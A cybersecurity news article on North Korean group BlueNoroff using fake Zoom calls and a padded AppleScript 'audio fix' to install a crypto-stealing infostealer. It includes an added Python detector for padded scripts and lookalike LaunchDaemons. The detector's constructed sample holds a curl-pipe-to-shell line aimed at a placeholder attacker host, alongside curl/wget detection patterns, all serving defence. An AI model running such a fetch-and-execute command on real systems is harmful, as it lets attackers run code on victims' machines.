Валентин Шнайдер
Hot News
27 June 2025, 12:45
North Korean hackers use Zoom to attack cryptocurrency companies
In 2025, BlueNoroff, the financial arm of the North Korean-linked Lazarus Group, began using Zoom as an attack tool. Attackers masquerade as business partners and use fake video calls to install malware that steals cryptocurrency and other financial data.
As Cybersecurity News reports, the infection begins with social engineering: attackers schedule fake Zoom meetings during which they send an "audio fix", a script that supposedly resolves sound problems. In fact, it is an AppleScript padded with over 10,000 empty lines to push the real malicious code out of sight. At lines 10,017–10,018, the script makes a curl request to the phishing domain zoom-tech[.]us and downloads the main infostealer.
The infection proceeds in several stages and uses advanced evasion techniques. For example, components with names like icloud_helper or Wi-Fi Updater imitate system utilities, and temporary files are deleted automatically to complicate incident analysis. The malware registers itself as a LaunchDaemon, which gives it administrator rights and ensures that it starts automatically at system startup.
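The two tradecraft details above (a script padded with thousands of empty lines before a curl download, and a LaunchDaemon with a system-utility-style name) are both cheap to check for on a suspect Mac. The following triage script is an added example written for this article, not code from the researchers or from any of the sources cited; the blank-line threshold, the lookalike keyword list, the sample AppleScript and the sample plist are all constructed for illustration, and the domain in the sample is a placeholder, not the real one from the report.

```python
"""Heuristic triage for padded AppleScript droppers and suspicious LaunchDaemons.

Added example: the thresholds, keywords and sample inputs are constructed.
"""
import plistlib
import re
from dataclasses import dataclass

# Constructed threshold. The reported dropper used >10,000 empty lines, so a
# far lower bar still catches it while leaving ordinary scripts alone.
BLANK_RUN_THRESHOLD = 200

# A shell one-liner that pulls content from the network (curl/wget + URL).
NETWORK_FETCH = re.compile(r"\b(?:curl|wget)\b[^\n]*?https?://([A-Za-z0-9.-]+)")

# Words that imitate Apple components; suspicious when the label is not com.apple.*
LOOKALIKE = re.compile(r"icloud|wi-?fi|updater|helper", re.IGNORECASE)

# Directories a persistent daemon binary should not normally be launched from.
SUSPICIOUS_PATH_PREFIXES = ("/tmp/", "/private/tmp/", "/var/folders/", "/Users/")


@dataclass
class Finding:
    kind: str
    detail: str


def longest_blank_run(text: str):
    """Return (run_length, line_no_of_first_code_line_after_run); (0, 0) if none."""
    best_len, best_end, run = 0, 0, 0
    lines = text.splitlines()
    for lineno, line in enumerate(lines, start=1):
        if line.strip() == "":
            run += 1
            continue
        if run > best_len:
            best_len, best_end = run, lineno
        run = 0
    if run > best_len:  # file ends inside a blank run
        best_len, best_end = run, len(lines) + 1
    return best_len, best_end


def scan_script(text: str) -> list:
    """Flag padding used to hide code, and any network download commands."""
    findings = []
    run_len, resumes_at = longest_blank_run(text)
    if run_len >= BLANK_RUN_THRESHOLD:
        findings.append(Finding("padding", f"{run_len} empty lines, code resumes at line {resumes_at}"))
    for lineno, line in enumerate(text.splitlines(), start=1):
        for match in NETWORK_FETCH.finditer(line):
            findings.append(Finding("network_fetch", f"line {lineno}: fetch from {match.group(1)}"))
    return findings


def scan_launchdaemon(plist_bytes: bytes) -> list:
    """Flag lookalike labels, binaries in temp/user paths, and auto-start."""
    findings = []
    data = plistlib.loads(plist_bytes)
    label = str(data.get("Label", ""))
    args = data.get("ProgramArguments") or [data.get("Program", "")]
    exe = str(args[0]) if args else ""
    if LOOKALIKE.search(label + " " + exe) and not label.startswith("com.apple."):
        findings.append(Finding("lookalike_name", f"{label} -> {exe}"))
    if exe.startswith(SUSPICIOUS_PATH_PREFIXES):
        findings.append(Finding("suspicious_path", exe))
    if data.get("RunAtLoad"):
        findings.append(Finding("run_at_load", label))
    return findings


# Constructed sample: one visible line, 10,000 empty lines, then the download.
SAMPLE_SCRIPT = (
    'display dialog "Applying Zoom audio fix..."\n'
    + "\n" * 10_000
    + 'do shell script "curl -fsSL https://attacker-controlled.example/payload | sh"\n'
)

# Constructed sample LaunchDaemon imitating an Apple helper, launched from /private/tmp.
SAMPLE_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0">
<dict>
  <key>Label</key><string>com.icloud_helper.agent</string>
  <key>ProgramArguments</key><array><string>/private/tmp/icloud_helper</string></array>
  <key>RunAtLoad</key><true/>
</dict>
</plist>
"""

if __name__ == "__main__":
    for finding in scan_script(SAMPLE_SCRIPT) + scan_launchdaemon(SAMPLE_PLIST):
        print(f"[{finding.kind}] {finding.detail}")
```

On a real host the same functions would be pointed at files under /Library/LaunchDaemons and at any script a user was asked to run during a call; the padding check works on the raw text, so it does not need the script to be compiled or executed.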
The attack aimed to steal cryptocurrency wallets, browser data, and authentication keys. Fintech, online gambling, and gaming companies in North America, Europe, and Asia are at risk. In particular, on May 28, 2025, an attack on an online casino in Canada was recorded, one of the most striking examples of the maturity of BlueNoroff’s tactics.
This is not the first time BlueNoroff has made headlines. The group has previously targeted crypto companies through phishing emails and infected documents. In their latest campaign, they have adapted to the realities of hybrid work, using legitimate platforms to build trust. As Field Effect notes, such attacks are becoming more frequent and sophisticated, requiring not only technical means but also staff training in social engineering.
We also recently reported that Cloudflare blocked an attack in which attackers attempted to flood a single server with traffic equivalent to 9,000 HD movies, the largest DDoS attack ever recorded.